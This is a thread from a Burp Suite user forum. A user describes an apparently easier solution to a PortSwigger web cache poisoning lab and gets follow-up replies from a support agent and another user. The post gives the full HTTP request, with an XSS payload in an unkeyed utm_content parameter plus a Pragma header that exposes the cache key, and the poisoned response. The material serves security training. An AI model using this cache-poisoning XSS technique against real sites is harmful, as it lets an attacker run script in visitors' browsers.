Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Hi, I think that I found a flaw.

aadda | Last updated: Jan 28, 2021 08:46PM UTC

Hi, I think that I found a flaw on https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-cache-key-injection lab, you can solve the lab just by adding Pragma: x-get-cache-key and issue request to this endpoint : ------------- GET /login?lang=en&utm_content=t'><svg/onload=alert(1)+x=' HTTP/1.1 Pragma: x-get-cache-key ext............ -------------------- you will get response like: ---------------------- HTTP/1.1 302 Found Location: /login/?lang=en&utm_content=t'><svg/onload=alert(1)+x=' Vary: Origin Connection: close Cache-Control: max-age=35 Age: 1 X-Cache-Key: /login?lang=en$$ X-Cache: hit X-XSS-Protection: 0 Content-Length: 0 -------------------- Notice that the X-Cache-Key, means anyone visits the home page will redirect to /login/?lang=en&utm_content=t'><svg/onload=alert(1)+x=', Which is [utm_content] parameter is unkeyed and will reflected to the head tag in html and the XSS will execute. [<link rel="canonical" href='//ace51f121f0a8ff3808125b800b800b0.web-security-academy.net/login/?lang=en&utm_content=t'><svg/onload=alert(1) x=''/>] I just want to send this because it easier than the solution in the lab.

Hannah, PortSwigger Agent | Last updated: Feb 01, 2021 12:50PM UTC

Hi Could you send a video of this to support@portswigger.net so we can verify the solution? Cheers!

nil0x42 | Last updated: Feb 01, 2021 02:38PM UTC

Hi ! I solved the challenge the same way...

Hannah, PortSwigger Agent | Last updated: Feb 02, 2021 12:58PM UTC

Hi Could you drop us a message with a video to support@portswigger.net?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.